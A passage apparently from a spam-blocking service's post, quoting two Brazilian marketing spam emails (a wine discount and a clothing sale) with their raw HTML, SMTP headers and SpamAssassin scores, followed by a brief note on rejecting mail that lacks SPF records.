float:left !important; text-align:center !important;}
}
</style>
</head>
<body bgcolor="#FFFFFF">
<center>
<table border="0" cellpadding="0" cellspacing="0"
style="width: 550px;">
<tbody>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&idctr=6&idp=206&idm=377&email=vas.sl@grupotreviso.com.br&rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&nome=&email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/top.jpg"
width="550" height="180" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&idctr=6&idp=206&idm=377&email=vas.sl@grupotreviso.com.br&rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&nome=&email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/accroche.jpg"
width="550" height="204" border="0" alt="3 anos" /></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&idctr=6&idp=206&idm=377&email=vas.sl@grupotreviso.com.br&rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&nome=&email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/top-text.jpg"
width="550" height="14" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td rowspan="2"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&idctr=6&idp=206&idm=377&email=vas.sl@grupotreviso.com.br&rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&nome=&email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/left.jpg"
width="206" height="231" border="0" alt="35% Off" /></a></td>
<td width="298" height="173" style="text-align:
center;"><span style="font-family: Arial, Helvetica, sans-serif; font-size:
17px; color: #a22943;"> Saboreie um dos australianos <br /> mais
vendidos<br /> <br /> <strong style="color: #c18520; font-size: 20px;">2010
Lindeman’s Cawarra</strong><br /> De <strike>R$45,90</strike> por
<strong style="font-size: 40px;">29,90<sup style="font-size:
14px;">1</sup></strong></span></td>
<td rowspan="2"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&idctr=6&idp=206&idm=377&email=vas.sl@grupotreviso.com.br&rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&nome=&email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/rigth.jpg"
width="46" height="231" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&idctr=6&idp=206&idm=377&email=vas.sl@grupotreviso.com.br&rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&nome=&email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/btn.gif"
width="298" height="58" border="0" alt="Brinde conosco" /></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&idctr=6&idp=206&idm=377&email=vas.sl@grupotreviso.com.br&rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&nome=&email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/bottom.jpg"
width="550" height="42" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td width="550" height="29" colspan="3"
style="text-align: center;"><span style="font-family: Arial, Helvetica,
sans-serif; font-size: 10px; color: #999;"> <sup>1</sup>Na compra de quatro
garrafas </span></td>
</tr>
<tr>
<td align="center" colspan="3">
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 15px 0 5px 0;">Conheça nossa
<a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&idctr=6&idp=206&idm=377&email=vas.sl@grupotreviso.com.br&rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&nome=&email=vas.sl@grupotreviso.com.br"
target="_blank" style="text-decoration: underline; color:
#666666;">Política de Privacidade.</a></p>
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 5px 0 5px 0;">Caso não queira
mais receber nossos informativos, <a
href="http://baratomail4.com.br/unsubscribe.php?M=1289652&C=c3022500f5f5b55357bb0bd5b2bd14ba&L=5&N=22"
target="_blank"><font color="#666666"><u>acesse este link</u></font></a> e
cancele sua inscrição.</p>
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 5px 0 5px 0;">2014 O Melhor Vinho do
Mundo - Todos os direitos reservados.</p>
</td>
</tr>
</tbody>
</table>
</center><img
src="http://tru.webelapp.com/adtckom.php?idc=60171&idctr=6&idp=206&idm=377&email=vas.sl@grupotreviso.com.br"
/>
<img
src="http://baratomail4.com.br/open.php?M=1289652&L=5&N=22&F=H&image=.jpg"
height="1" width="10"></body>
</html>
a other Mail is:
Return-Path: <bounce-2696-19326188-4124-248@hiperlux.com.br>
Delivered-To: root@blocklist.de
Received: by mail.blocklist.de (Postfix, from userid 1001)
id 8D69A2F1B76; Thu, 20 Mar 2014 06:52:32 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 8D69A2F1B76
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
server5.customer-config.de
X-Spam-Level: **
X-Spam-ASN: AS18881 186.215.224.0/19
X-Spam-Status: No, hits=2.6 required=5.5 tests=AWL=-0.625,BAYES_00=-6.1,
FUZZY_CREDIT=1.678,HTML_IMAGE_RATIO_04=0.556,HTML_MESSAGE=0.001,
RAZOR2_CF_RANGE_51_100=0.5,RAZOR2_CF_RANGE_E8_51_100=1.886,RAZOR2_CHECK=0.922,
RDNS_NONE=0.793,SPF_HELO_PASS=-0.001,URIBL_BLACK=1.725,URIBL_JP_SURBL=1.25
bayes=0.0000 relaysuntrusted=[ ip=186.215.253.93 rdns= helo=irmadulce.org.br
by=smtp-mx.blocklist.de ident= envfrom= intl=0 id=4430BD592E593 auth= msa=0 ]
[ ip=213.252.246.27 rdns= helo=hiper27.hiperlux.com.br by=QA-Mail ident=
envfrom= intl=0 id= auth= msa=0 ] autolearn=disabled scanned=[Thu, 20 Mar
2014 06:52:32 +0100] version=3.3.1
Received: from smtp-mx.blocklist.de (smtp-mx.blocklist.de [93.180.154.80])
by mail.blocklist.de (Postfix) with ESMTP id A45362F1A6A
for <root@blocklist.de>; Thu, 20 Mar 2014 06:52:19 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de A45362F1A6A
Received-SPF: none (hiperlux.com.br: No applicable sender policy available) receiver=smtp-mx.blocklist.de; identity=mailfrom; envelope-from="bounce-2696-19326188-4124-248@hiperlux.com.br"; helo=irmadulce.org.br; client-ip=186.215.253.93
X-DKIM: OpenDKIM Filter v2.0.1 smtp-mx.blocklist.de 4430BD592E593
Received: from irmadulce.org.br (unknown [186.215.253.93])
by smtp-mx.blocklist.de (Postfix) with SMTP id 4430BD592E593
for <postmaster@blocklist.de>; Thu, 20 Mar 2014 06:53:51 +0100 (CET)
X-Qamailsafe-Spam-Score: 99
X-QamailSafe-Checksum: dfb0ca8c4697d217b63e40816742068736151bac7c4c252c3ec6069092015da4
X-QamailSafe-Source-Addr: 213.252.246.27
Received: from 213.252.246.27 (EHLO hiper27.hiperlux.com.br)
by QA-Mail Safe 7.0.14; Thu, 20 Mar 2014 00:08:14 -0300
Date: Thu, 20 Mar 2014 00:06:16 -0300
To: "valdson.santos@irmadulce.org.br" <valdson.santos@irmadulce.org.br>
From: Triton - Roupas e Acessorios <Triton@hiperlux.com.br>
Reply-to: Triton - Roupas e Acessorios <Triton@hiperlux.com.br>
Subject: Presente para voce, consumidor: ate 60% off em pecas selecionadas
Message-ID: <ee5e6dfa82664ef97b3debab3faf58ca@localhost.localdomain>
X-Priority: 3
Sender: <"user-rt@info"@hiperlux.com.br>
X-Mailer: OEM
X-Complaints-To: spam-report@hiperlux.com.br
List-Unsubscribe: <http://hiperlux.com.br/media/u.php?p=s5/rs/21vc/sc/u4/rs>
X-MessageID: s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs
X-Report-Abuse: <http://hiperlux.com.br/media/report_abuse.php?mid=s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs>
X-SMTPAPI: {"unique_args":{"abuse-id":"s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs"}, "category":"campaign"}
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="b1_ee5e6dfa82664ef97b3debab3faf58ca"
--b1_ee5e6dfa82664ef97b3debab3faf58ca
Content-Type: text/plain; charset = "utf-8"
Content-Transfer-Encoding: quoted-printable
Ola,=0A=0AAproveite essa chance e acesse esse email para desfrutar dos melh=
ores negocios disponiveis no mercado.=0A=0ATemos certeza que voce nao ira s=
e arrepender mas nao demore pois so valem hoje.em at=C3=A9 10x - 1 troca gr=
=C3=A1tis - Frete Gr=C3=A1tis =C3=A0 partir R$ 299=0A=0A( http://www.triton=
.com.br/?utm_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D140319 )=
=0A( http://beta.triton.com.br/feminino?utm_source=3DGet_mail&utm_medium=3D=
Disparo&utm_campaign=3D140319 )=0A( http://beta.triton.com.br/masculino?utm=
_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D140319 )=0A( http://=
www.triton.com.br/hotsite/sale-triton?utm_source=3DGet_mail&utm_medium=3DDi=
sparo&utm_campaign=3D140319 )=0A=0A( http://www.triton.com.br/hotsite/sale-=
triton?utm_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D140319 )=
=0A=0A( http://www.triton.com.br/hotsite/sale-triton?utm_source=3DGet_mail&=
utm_medium=3DDisparo&utm_campaign=3D140319 )=0A=0A( http://www.triton.com.b=
r/hotsite/sale-triton?url1=3Dfeminino&page=3D1#sidebar&utm_source=3DGet_mai=
l&utm_medium=3DDisparo&utm_campaign=3D140319 )=0A( http://www.triton.com.br=
/hotsite/sale-triton?url1=3Dmasculino&page=3D1&utm_source=3DGet_mail&utm_me=
dium=3DDisparo&utm_campaign=3D140319 )=0A=0A( http://www.triton.com.br/hots=
ite/sale-triton?utm_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D1=
40319 )=0A=0A( http://instagram.com/tritonoficial )=0A( https://www.faceboo=
k.com/tritonpage )=0A( http://www.youtube.com/tritonlovers )=0A( http://twi=
tter.com/TritonLovers )=0A=0ASEGURAN=C3=87A E PRIVACIDADE=0A=0AVoc=C3=AA re=
cebeu esta mensagem porque se cadastrou para receber=0Ae-mails da Triton. N=
=C3=B3s respeitamos a sua privacidade. Caso n=C3=A3o=0Aqueira mais receber =
mais mensagens da Triton, cancele o=0Arecebimento no link de descadastro no=
final deste=0Ae-mail. O envio de e-mails ser=C3=A1 feito apenas com o seu=
=0Aconsentimento e poder=C3=A1 ser desativado h=C3=A1 qualquer momento. Som=
os=0Acontra o envio de e-mails sem autoriza=C3=A7=C3=A3o pr=C3=A9via (conhe=
cidos como=0ASPAM), no entanto, ap=C3=B3s requisitar o cancelamento a Trito=
n poder=C3=A1=0Alevar at=C3=A9 sete dias para processar sua solicita=C3=A7=
=C3=A3o.=0A=0AENTREGA=0A=0AComprando em nosso site, voc=C3=AA receber=C3=A1=
os produtos de maneira=0Ar=C3=A1pida, eficiente e segura. Nosso prazo =C3=
=A9 de at=C3=A9 08 (oito) dias=0A=C3=BAteis para capitais e regi=C3=B5es me=
tropolitanas ap=C3=B3s a confirma=C3=A7=C3=A3o=0Ado pagamento. Para as dema=
is cidades, o prazo =C3=A9 de at=C3=A9 15=0A(quinze) dias =C3=BAteis. Duran=
te o processo de compra voc=C3=AA poder=C3=A1=0Acalcular a estimativa do pr=
azo de entrega que ser=C3=A1 informada. O=0Aprazo para entrega dos produtos=
varia de acordo com o peso de=0Aproduto, local de entrega e tipo de envio.=
O recebimento do=0Apedido pode ser realizado por terceiros, como porteiros=
de=0Acondom=C3=ADnios e familiares, desde que assinem o comprovante de=0Ar=
ecebimento da mercadoria. S=C3=A3o realizadas tr=C3=AAs tentativas de=0Aent=
rega, em dias =C3=BAteis consecutivos. Ocorrendo tr=C3=AAs tentativas de=0A=
entrega sem sucesso o produto ser=C3=A1 devolvido ao Centro de=0ADistribui=
=C3=A7=C3=A3o da loja online. Para um novo envio o custo do frete=0A=C3=A9 =
por conta do cliente e ser=C3=A1 dado um novo prazo de entrega. Os=0Aprodut=
os ser=C3=A3o entregues de segunda a s=C3=A1bado em hor=C3=A1rio=0Acomercia=
l.=0AO frete =C3=A9 gr=C3=A1tis para pedidos acima de R$ 299,00.=0A=0APAGAM=
ENTO=0A=0AAceitamos pagamento por Boleto Banc=C3=A1rio ou por Cart=C3=A3o=
=0Ade Cr=C3=A9dito (Visa, Mastercard, Diners, Amex, Elo e Discover) em=0Aat=
=C3=A9 10x sem juros. Todas as formas de pagamento=0Atamb=C3=A9m est=C3=A3o=
dispon=C3=ADveis no Televendas (47) 3390-5503.=0A=0ACONTATO=0A=0APara envi=
ar suas d=C3=BAvidas, sugest=C3=B5es ou coment=C3=A1rios, contate-nos=0Aatr=
aves do Telefone: (47) 3390-5503 |=0AChat: acesse aqui ( http://e2e.neoassi=
st.com/?action=3Dneolive&scr=3Drequest&th=3Dtritonnovo&ForcaAutenticar=3D1&=
UMail=3D&email=3D&name=3D&uName=3D=3D ) | Email: contato@e2e.com.br=0ANosso=
hor=C3=A1rio de atendimento =C3=A9 de segunda =C3=A0 sexta-feira=0Adas 8 =
=C3=A0s 17h, (exceto feriados).=0A=0APRE=C3=87O=0A=0AO pre=C3=A7o dos produ=
tos podem sofrer altera=C3=A7=C3=B5es sem aviso pr=C3=A9vio.=0ACaso haja di=
verg=C3=AAncia do pre=C3=A7o da loja virtual com o da=0Anewsletter, o valor=
a considerar ser=C3=A1 o da loja.=0A=0A( http://www.triton.com.br/ )Caso n=
ao deseje mais receber envie nos um email
--b1_ee5e6dfa82664ef97b3debab3faf58ca
Content-Type: text/html; charset = "utf-8"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.=
w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">=0A<html xmlns=3D"http://www.=
w3.org/1999/xhtml">=0A<head>=0A<meta http-equiv=3D"Content-Type" content=3D=
"text/html; charset=3DUTF-8" />=0A<title>Triton</title>=0A<style type=3D"te=
xt/css">=0A<!--=0Abody {=0A margin-left: 0px;=0A margin-top: 0px;=0A mar=
gin-right: 0px;=0A margin-bottom: 0px;=0A}=0A-->=0A</style></head>=0A=0A<b=
ody bgcolor=3D"#fff">=0A=0A<p style=3D"text-align: center;"><a href=3D"http=
://hiperlux.com.br/media/wb.php?p=3Ds5/u4/rs/21vc/sc/rs">Caso nao consiga v=
er essa mensagem acesse</a></p>=0A<table border=3D"0" cellspacing=3D"0" cel=
lpadding=3D"0" align=3D"center" style=3D"border: 1px solid #000000; width: =
600px;">=0A<tbody>=0A<tr>=0A<td height=3D"40" bgcolor=3D"#FFFFFF" style=3D"=
padding-left: 10px; border-right: solid 1px #000;"><font style=3D"font-fami=
ly: Arial, Helvetica, sans-serif; font-size: 9px; color: #000; text-transfo=
rm: uppercase;">em até 10x - 1 troca grátis - Frete Grá=
;tis à partir R$ 299</font></td>=0A<td align=3D"right" bgcolor=3D"#F=
FFFFF" style=3D"padding-right: 10px;"><font style=3D"font-family: Arial, He=
lvetica, sans-serif; font-size: 9px; color: #000; text-transform: uppercase=
;"><br /><font style=3D"text-decoration: underline;"></font></font></td>=0A=
</tr>=0A</tbody>=0A</table>=0A<table border=3D"0" align=3D"center" cellpadd=
ing=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td=
><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Tri=
ton/http%3A%2F%2Fwww.triton.com.br%2F%3Futm_source%3DGet_mail%26utm_medium%=
3DDisparo%26utm_campaign%3D140319" title=3D"Triton" target=3D"_blank"><img =
src=3D"http://www.e2e.com.br/E/20140318_Triton/images/img_02.jpg" alt=3D"Tr=
iton" width=3D"334" height=3D"91" border=3D"0" style=3D"display: block;" />=
</a></td>=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs=
/21vc/sc/rs/Feminino/http%3A%2F%2Fbeta.triton.com.br%2Ffeminino%3Futm_sourc=
e%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=3D"Femin=
ino" target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/=
images/img_03.jpg" alt=3D"Feminino" width=3D"99" height=3D"91" border=3D"0"=
style=3D"display: block;" /></a></td>=0A<td><a href=3D"http://hiperlux.com=
.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Masculino/http%3A%2F%2Fbeta.triton=
.com.br%2Fmasculino%3Futm_source%3DGet_mail%26utm_medium%3DDisparo%26utm_ca=
mpaign%3D140319" title=3D"Masculino" target=3D"_blank"><img src=3D"http://w=
ww.e2e.com.br/E/20140318_Triton/images/img_04.jpg" alt=3D"Masculino" width=
=3D"110" height=3D"91" border=3D"0" style=3D"display: block;" /></a></td>=
=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/=
rs/Sale/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Futm_source=
%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=3D"Sale" =
target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/image=
s/img_05.jpg" alt=3D"Sale" width=3D"57" height=3D"91" border=3D"0" style=3D=
"display: block;" /></a></td>=0A</tr>=0A</tbody>=0A</table>=0A<!--conteudo-=
->=0A<table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" align=3D"cente=
r" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td colspan=3D"2"><a href=3D=
"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Dia%20do%20Con=
sumidor%20-%20at%26eacute%3B%2060%25%20off/http%3A%2F%2Fwww.triton.com.br%2=
Fhotsite%2Fsale-triton%3Futm_source%3DGet_mail%26utm_medium%3DDisparo%26utm=
_campaign%3D140319" title=3D"Dia do Consumidor - até 60% off" target=
=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140319_TritonConsumidor/i=
mages/img_02.jpg" alt=3D"Dia do Consumidor - até 60% off" width=3D"6=
00" height=3D"194" border=3D"0" style=3D"display: block;" /></a></td>=0A</t=
r>=0A<tr>=0A<td colspan=3D"2"><a href=3D"http://hiperlux.com.br/media/tl.ph=
p?p=3Ds5/u4/rs/21vc/sc/rs/Dia%20do%20Consumidor%20-%20at%26eacute%3B%2060%2=
5%20off/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Futm_source=
%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=3D"Dia do=
Consumidor - até 60% off" target=3D"_blank"><img src=3D"http://www.=
e2e.com.br/E/20140319_TritonConsumidor/images/img_03.jpg" alt=3D"Dia do Con=
sumidor - até 60% off" width=3D"600" height=3D"182" border=3D"0" sty=
le=3D"display: block;" /></a></td>=0A</tr>=0A<tr>=0A<td><a href=3D"http://h=
iperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Feminino/http%3A%2F%2Fw=
ww.triton.com.br%2Fhotsite%2Fsale-triton%3Furl1%3Dfeminino%26page%3D1%23sid=
ebar%26utm_source%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319=
" title=3D"Feminino" target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/=
20140319_TritonConsumidor/images/img_04.jpg" alt=3D"Feminino" width=3D"173"=
height=3D"219" border=3D"0" style=3D"display: block;" /></a></td>=0A<td><a=
href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Mascul=
ino/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Furl1%3Dmasculi=
no%26page%3D1%26utm_source%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign=
%3D140319" title=3D"Masculino" target=3D"_blank"><img src=3D"http://www.e2e=
.com.br/E/20140319_TritonConsumidor/images/img_05.jpg" alt=3D"Masculino" wi=
dth=3D"427" height=3D"219" border=3D"0" style=3D"display: block;" /></a></t=
d>=0A</tr>=0A<tr>=0A<td colspan=3D"2"><a href=3D"http://hiperlux.com.br/med=
ia/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Dia%20do%20Consumidor%20-%20at%26eacute%3=
B%2060%25%20off/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Fut=
m_source%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=
=3D"Dia do Consumidor - até 60% off" target=3D"_blank"><img src=3D"h=
ttp://www.e2e.com.br/E/20140319_TritonConsumidor/images/img_06.jpg" alt=3D"=
Dia do Consumidor - até 60% off" width=3D"600" height=3D"77" border=
=3D"0" style=3D"display: block;" /></a></td>=0A</tr>=0A</tbody>=0A</table>=
=0A<!--fim conteudo-->=0A<table border=3D"0" align=3D"center" cellpadding=
=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td><i=
mg style=3D"display: block;" border=3D"0" src=3D"http://www.e2e.com.br/E/20=
140318_Triton/images/img_13.jpg" width=3D"231" height=3D"64" /></td>=0A<td>=
<a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Inst=
agram/http%3A%2F%2Finstagram.com%2Ftritonoficial" title=3D"Instagram" targe=
t=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/images/img=
_14.jpg" alt=3D"Instagram" width=3D"34" height=3D"64" border=3D"0" style=3D=
"display: block;" /></a></td>=0A<td><a href=3D"http://hiperlux.com.br/media=
/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Facebook/https%3A%2F%2Fwww.facebook.com%2Ft=
ritonpage" title=3D"Facebook" target=3D"_blank"><img src=3D"http://www.e2e.=
com.br/E/20140318_Triton/images/img_15.jpg" alt=3D"Facebook" width=3D"35" h=
eight=3D"64" border=3D"0" style=3D"display: block;" /></a></td>=0A<td><a hr=
ef=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Youtube/h=
ttp%3A%2F%2Fwww.youtube.com%2Ftritonlovers" title=3D"Youtube" target=3D"_bl=
ank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/images/img_16.jpg"=
alt=3D"Youtube" width=3D"34" height=3D"64" border=3D"0" style=3D"display: =
block;" /></a></td>=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=
=3Ds5/u4/rs/21vc/sc/rs/Twitter/http%3A%2F%2Ftwitter.com%2FTritonLovers" tit=
le=3D"Twitter" target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/201403=
18_Triton/images/img_17.jpg" alt=3D"Twitter" width=3D"36" height=3D"64" bor=
der=3D"0" style=3D"display: block;" /></a></td>=0A<td><img style=3D"display=
: block;" border=3D"0" src=3D"http://www.e2e.com.br/E/20140318_Triton/image=
s/img_18.jpg" width=3D"230" height=3D"64" /></td>=0A</tr>=0A</tbody>=0A</ta=
ble>=0A<table border=3D"0" align=3D"center" cellpadding=3D"0" cellspacing=
=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td align=3D"center" bgc=
olor=3D"#FFFFFF"><font style=3D"font-family: Arial, Helvetica, sans-serif; =
font-size: 11px; color: #503a5d;">SEGURANÇA E PRIVACIDADE<br /> <br =
/> <font style=3D"color: #636363;">Você recebeu esta mensagem porque =
se cadastrou para receber e-mails da Triton. Nós respeitamos a sua p=
rivacidade. Caso não queira mais receber mais mensagens da Triton, c=
ancele o recebimento no link de descadastro no final deste<br /> e-mail. O =
envio de e-mails será feito apenas com o seu consentimento e poder&a=
acute; ser desativado há qualquer momento. Somos contra o envio de e=
-mails sem autorização prévia (conhecidos como SPAM), =
no entanto, após requisitar o cancelamento a Triton poderá le=
var até sete dias para processar sua solicitação.</fon=
t></font></td>=0A</tr>=0A</tbody>=0A</table>=0A<table border=3D"0" align=3D=
"center" cellpadding=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tb=
ody>=0A<tr>=0A<td width=3D"300" align=3D"center" valign=3D"top" bgcolor=3D"=
#FFFFFF"><font style=3D"font-family: Arial, Helvetica, sans-serif; font-siz=
e: 11px; color: #503a5d;"><br /> ENTREGA<br /> <br /> <font style=3D"color:=
#636363;">Comprando em nosso site, você receberá os produtos =
de maneira rápida, eficiente e segura. Nosso prazo é de at&ea=
cute; 08 (oito) dias úteis para capitais e regiões metropolit=
anas após a confirmação do pagamento. Para as demais c=
idades, o prazo é de até 15 (quinze) dias úteis. Duran=
te o processo de compra você poderá calcular a estimativa do p=
razo de entrega que será informada. O prazo para entrega dos produto=
s varia de acordo com o peso de produto, local de entrega e tipo de envio. =
O recebimento do pedido pode ser realizado por terceiros, como porteiros de=
condomínios e familiares, desde que assinem o comprovante de recebi=
mento da mercadoria. São realizadas três tentativas de entrega=
, em dias úteis consecutivos. Ocorrendo três tentativas de ent=
rega sem sucesso o produto será devolvido ao Centro de Distribui&cce=
dil;ão da loja online. Para um novo envio o custo do frete é =
por conta do cliente e será dado um novo prazo de entrega. Os produt=
os serão entregues de segunda a sábado em horário come=
rcial.<br /> O frete é grátis para pedidos acima de R$ 299,00=
.</font></font></td>=0A<td width=3D"300" align=3D"center" valign=3D"top" bg=
color=3D"#FFFFFF"><font style=3D"font-family: Arial, Helvetica, sans-serif;=
font-size: 11px; color: #636363;"><br /> <font style=3D"color: #503a5d;">P=
AGAMENTO</font><br /> <br /> Aceitamos pagamento por Boleto Bancário=
ou por Cartão<br /> de Crédito (Visa, Mastercard, Diners, Am=
ex, Elo e Discover) em até 10x sem juros. Todas as formas de pagamen=
to<br /> também estão disponíveis no Televendas (47) 3=
390-5503. <br /> <font style=3D"color: #503a5d;"><br /> CONTATO</font> <br =
/> <br /> Para enviar suas dúvidas, sugestões ou coment&aacut=
e;rios, contate-nos atraves do Telefone: (47) 3390-5503 |<br /> Chat: acess=
e <a style=3D"color: #503a5d;" href=3D"http://hiperlux.com.br/media/tl.php?=
p=3Ds5/u4/rs/21vc/sc/rs//http%3A%2F%2Fe2e.neoassist.com%2F%3Faction%3Dneoli=
ve%26scr%3Drequest%26th%3Dtritonnovo%26ForcaAutenticar%3D1%26UMail%3D%26ema=
il%3D%26name%3D%26uName%3D%3D" target=3D"_blank">aqui</a> | Email: contato@=
e2e.com.br<br /> Nosso horário de atendimento é de segunda &a=
grave; sexta-feira<br /> das 8 às 17h, (exceto feriados). <br /> <br=
/> <font style=3D"color: #503a5d;">PREÇO</font><br /> <br /> O pre&=
ccedil;o dos produtos podem sofrer alterações sem aviso pr&ea=
cute;vio. Caso haja divergência do preço da loja virtual com o=
da newsletter, o valor a considerar será o da loja. </font></td>=0A=
</tr>=0A</tbody>=0A</table>=0A<br />=0A<table border=3D"0" align=3D"center"=
cellpadding=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<=
tr>=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/=
sc/rs/Rodape/http%3A%2F%2Fwww.triton.com.br%2F" title=3D"Rodape" target=3D"=
_blank"><img style=3D"display: block;" border=3D"0" src=3D"http://www.e2e.c=
om.br/E/20140318_Triton/images/img_20.jpg" alt=3D"Rodape" width=3D"600" hei=
ght=3D"66" /></a></td>=0A</tr>=0A</tbody>=0A</table>=0A<p style=3D"text-ali=
gn: center;"><a href=3D"http://hiperlux.com.br/media/u.php?p=3Ds5/rs/21vc/s=
c/u4/rs/rt">Se nao quiser mais receber esses emails acesse aqui</a></p>=0A=
=0A=0A<img src=3D"http://hiperlux.com.br/media/to.php?p=3Ds5/u4/rs/21vc/sc/=
rs" width=3D"5" height=3D"2" alt=3D".">=0A=0A</body>=0A</html>
--b1_ee5e6dfa82664ef97b3debab3faf58ca--
So, we reject now all Mails which has no spf-Records and sent a Mail to postmaster@ or have a X-MESSAGE-ID
The most Mails was now reject because there has no spf-record or false, are listen in spamhaus.org or a header-map entry matcht:
